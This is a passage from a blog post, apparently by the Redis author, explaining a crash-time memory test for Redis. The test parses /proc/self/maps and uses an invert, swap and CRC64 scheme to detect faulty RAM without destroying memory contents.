The first problem could be addressed simply using a policy: a crash without a memory test is not investigated if it looks suspicious. However this is not good for the Redis project nor for the users: sometimes an user will file a report and will simply have no more time to help us. Some other time it can't stop the server. And we developers may miss the opportunity to track a bug just because of a bad attitude and the possibility of a memory error.

The second problem, related to people using virtualization, is even worse. Even when users want to help you, then can't in a reliable way.

So what about testing memory just when a crash happens? This would allow Redis to test the memory of every single computer where a crash has happened. The bug report will be annotated with the result of the test, providing an interesting hint about the state of the memory without further help from the user.

And even better, the test will test exactly the memory as allocated at the moment of the crash! It will test exactly the physical memory pages that Redis is using, that is just perfect for environments like EC2.

The problem is, how to do it?

How to test on crashes
===

My first idea was to test memory incrementally inside the allocator.
Like, from time to time, if you allocate some memory, run a fast memory test on it and log it on the Redis log and in the INFO output if a problem was detected.

In theory it is nice, and I even implemented the idea. The problem is, it is completely unreliable. If the broken memory is allocated for something that is never deallocated later, it will never be tested again. Worse than that, it takes a lot of time to test the whole memory incrementally small piece after small piece, and what about testing every single location? The allocator itself uses "internal" memory that is never exposed to the user, and we are missing all these pages.

Bad idea... and... the implementation I wrote was not working at all as the CPU cache made it completely useless, as testing small pieces of memory incrementally results in a constant cache hit.

The second try was definitely better, and was simply to test the whole space of allocated memory, but only when a crash happens.

At first this looks pretty hard: at least you need to get a lot more help from the memory allocator you are using. I don't think jemalloc has an out of the box way to report the memory regions allocated so far. Also if we are crashing, I'm not sure how reliable asking the allocator to report memory regions could be.
As a result of a single bit error, it is very easy to see the error propagating at random locations.

There are other problems. After a crash we want to be able to dump a core that is meaningful. If during the memory test we fill our memory with patterns, the core file will be completely useless. This means that the memory test needed to be conceived so that at the end of the test the memory was left untouched.

The proc filesystem /proc//maps
===

The Linux implementation of the proc filesystem makes Linux an exceptionally introspective operating system. A developer needs minimal efforts to be able to access informations that are usually non exposed to the user space. Actually the effort required is so small as to parse a text file.

The "maps" file of the proc filesystem shows line after line all the memory mapped regions for a given process and their permissions (read, write, execute).
The sum of all the reported regions is the whole address space that can be accessed in some way by the specified process.

Some of this maps are "special" maps created by the kernel itself, like the process stack. Other maps are memory mapped files like dynamic libraries, and others are simply regions of memory allocated by malloc(), either using the sbrk() syscall or an anonymous mmap().

The following two lines are examples of maps
(obtained with "cat /proc/self/maps)

7fb1b699b000-7fb1b6b4e000 r-xp 00000000 08:05 15735004 /lib/x86_64-linux-gnu/libc-2.15.so
7fb1b6f5f000-7fb1b6f62000 rw-p 00000000 00:00 0

The first part of each line is the address range of the memory mapped area, followed by permissions "rwxp" (read, write, execute, private), the second is the offset in case of a memory mapped file, then there is the device id, that is 00:00 for anonymous maps, and finally the inode and file name for memory mapped files.

We are interested to check all the heap allocated memory that is readable and writable, so a simple grep will do the trick:

$ cat /proc/self/maps | grep 00:00 | grep rw

01cbb000-01cdc000 rw-p 00000000 00:00 0 [heap]
7f46859f9000-7f46859fe000 rw-p 00000000 00:00 0
7f4685c05000-7f4685c08000 rw-p 00000000 00:00 0
7f4685c1e000-7f4685c20000 rw-p 00000000 00:00 0
7fffe7048000-7fffe7069000 rw-p 00000000 00:00 0 [stack]

Here we can find both the heap allocated using the setbrk() system call, and the heap allocated using anonymous maps. However there is one thing that we don't want to scan, that is the stack, otherwise the function that is testing the memory itself would easily crash.

So thanks to the Linux proc filessystem the first problem is no longer a big issue, and we use some code like this:

int memtest_test_linux_anonymous_maps(void) {
FILE *fp = fopen("/proc/self/maps","r");

... some more var declaration ...

while(fgets(line,sizeof(line),fp) != NULL) {
char *start, *end, *p = line;

start = p;
p = strchr(p,'-');
if (!p) continue;
*p++ = '\0';
end = p;
p = strchr(p,' ');
if (!p) continue;
*p++ = '\0';
if (strstr(p,"stack") ||
strstr(p,"vdso") ||
strstr(p,"vsyscall")) continue;
if (!strstr(p,"00:00")) continue;
if (!strstr(p,"rw")) continue;

start_addr = strtoul(start,NULL,16);
end_addr = strtoul(end,NULL,16);
size = end_addr-start_addr;

start_vect[regions] = start_addr;
size_vect[regions] = size;
printf("Testing %lx %lu\n", start_vect[regions], size_vect[regions]);
regions++;
}

... code to actually test the found memory regions ...
/* NOTE: It is very important to close the file descriptor only now
* because closing it before may result into unmapping of some memory
* region that we are testing. */
fclose(fp);
}

CPU cache
===

The other problem we have is the CPU cache. If we try to write something to a given memory address, and read it back to check if it is ok, we are actually only stressing the CPU cache and never hitting the memory that is supposed to be tested.

Actually writing a memory test that bypasses the CPU cache, without the need to resort to CPU specific tricks (like memory type range registers), is easy:

1) Fill all the addressable memory from the first to the last with the pattern you are testing.
2) Check all the addressable memory, from the first to the last, to see if the pattern can be read back as expected.

Because we do it in two passes, as long as the size of the memory we are testing is larger than the CPU cache, we should be able to test the memory in a reliable way.

But there is a problem: this test destroys the content of the memory, that is not acceptable in our case, remember that we want to be able to provide a meaningful core dump if needed, after the crash?

On the other side, writing a memory test that does not destroy the memory content, but that is not able to bypass the cache, is also easy: for each location save the value of the location on the stack, test the location writing patterns and reading the patterns back, and finally set the correct value back to the tested location. However this test is completely useless as long as we are not able to disable the CPU cache.

How to write a memory test that:

A) Is able to bypass the cache.
B) Does not destroy the memory content.
C) Is able to, at least, to test every memory bit in the two possible states.

Well that's what I asked myself during the past weekend, and I found a simple solution that works as expected (as tested in a computer with broken memory, thanks Kosma! See credits at the end of the post).

This is the algorithm:

1) Take a CRC64 checksum of the whole memory.
2) Invert the content of every location from the first to the last (With "invert" I mean, bitwise complement, so that every 1 is turned into 0, and every 0 turned into 1).
3) Swap every adjacent location content. So I swap the content at addresses 0 and 1, 2 and 3, ... and so forth.
4) Swap again (step 3).
5) Invert again (step 2).
6) Take a CRC64 checksum of the whole memory.
7) Swap again.
8) Swap again.
9) Take a CRC64 checksum of the whole memory again.

If the CRC64 obtained at step 1, 6, and 9 are not the same, there is some memory error.

Now let's check why this is supposed to work: It is trivial to see how if memory is working as expected, after the steps I get back the original memory content, since I swap four times, and invert two times. However what happens if there are memory errors?

Let's do a test considering memory locations of just two bits for simplicity. So I've something like:

01|11|11|00
|
+----- this bit is broken and is always set to 1.

(step 1: CRC64)
After step 2: 10|00|10|11 (note that the broken bit is still 1 instead of 0)
After step 3: 00|10|11|10 (adjacent locations swapped)
After step 4: 10|00|10|11 (swapped again)
After step 5: 01|11|11|00 (inverted again, so far, no errors detected)
(step 6: CRC64)
After step 7: 11|01|10|11
After step 8: 01|11|11|10 (error!)
(step 9: CRC64)

The CRC64 obtained at step 9 will differ.
Now let's check the case of a bit always set to 0.

01|11|01|00
|
+----- this bit is broken and is always set to 0.

(step 1: CRC64)
After step 2: 10|00|00|11 (invert)
After step 3: 00|10|01|00 (swap)
After step 4: 10|00|00|01 (swap)
After step 5: 01|11|01|10 (invert)
(step 6: CRC64)
After step 7: 11|01|00|01 (swap)
After step 8: 01|11|01|00 (swap)
(step 9: CRC64)

This time is the CRC64 obtained at step 6 that will differ.
You can check what happens if you flip bits in the adjacent location, but either at step 6 or 9 you should be always able to see a different checksum.

So basically this test does two things: first it amplifies the error using an adjacent location as helper, then use checksums to detect the error. The steps are performed always as "read + write" operations acting sequentially from the first to the last memory location to disable as much as possible the CPU cache.

You can find the code implementing this in the "memcheck-on-crash" branch on github, "debug.c" file:

https://github.com/antirez/redis/blob/memtest-on-crash/src/debug.c#L669

The kernel could do it better
===

After dealing with many crash reports that are actually due to memory errors, I'm starting to think that kernels are missing an incredible opportunity to make computers more reliable.

What Redis is doing could be done incrementally, a few pages per second, by the kernel with no impacts to actual performance. And the kernel is in a particularly good position:

1) It could detect the error easily bypassing the cache.
2) It could perform more interesting value retaining error tests writing patterns to pages that will be reused much later in time, and checking if the pattern matches before the page is reused.
3) The error could be logged in the system logs, making the user aware before a problem happens.
4) It could exclude the broken page from being used again, resulting in safer computing.

I hope to see something like that in the Linux kernel in the future.

The life of a lonely cosmic ray
===

A bit flipping at random is not a problem solely related to broken memory. Perfectly healthy memory is also subject, with a small probability, to bit flipping because of cosmic rays.

We are talking, of course, of non error correcting memory. The more costly ECC memory can correct a single bit error and can detect two bits errors halting the system. However many (most?) servers are currently using non ECC memory, and it is not clear if Amazon EC2 and other cloud providers are using or not ECC memory (it is not ok that this information is not clearly available in my opinion, given the cost of services like EC2 and the possible implications of not using ECC memory).

According to a few sources, including IBM, Intel and Corsair, a computer with a few GB of memory of non-ECC memory is likely to incur to *several* memory errors every year.
Of course you can't detect errors with a memory test if the bit flipping was caused by a cosmic ray hitting your memory, so to cut a long story short:

Users reporting isolated, impossible to understand and reproduce crashes, not using ECC memory, can't be taken as a proof that there is a bug even if the fast on-crash memory test passes, if the more accurate redis --test-memory passes, and even if they run memtest86 for several days after the event.

Anyway not every bit flipped is going to trigger a crash after all, because as somebody on stack overflow said:

"Most of the memory contains data, where the flip won't be that visiblp"

The bytes representing 'p' and 'e' are not just 1 bit away, but I find the sentence to be fun anyway.

Credits
===

A big Thank You to Kosma Moczek that reported how my initial approach was not working due to the CPU cache, and donated ssh access to a fast computer with a single bit memory error. Comments]]>
http://antirez.com/news/43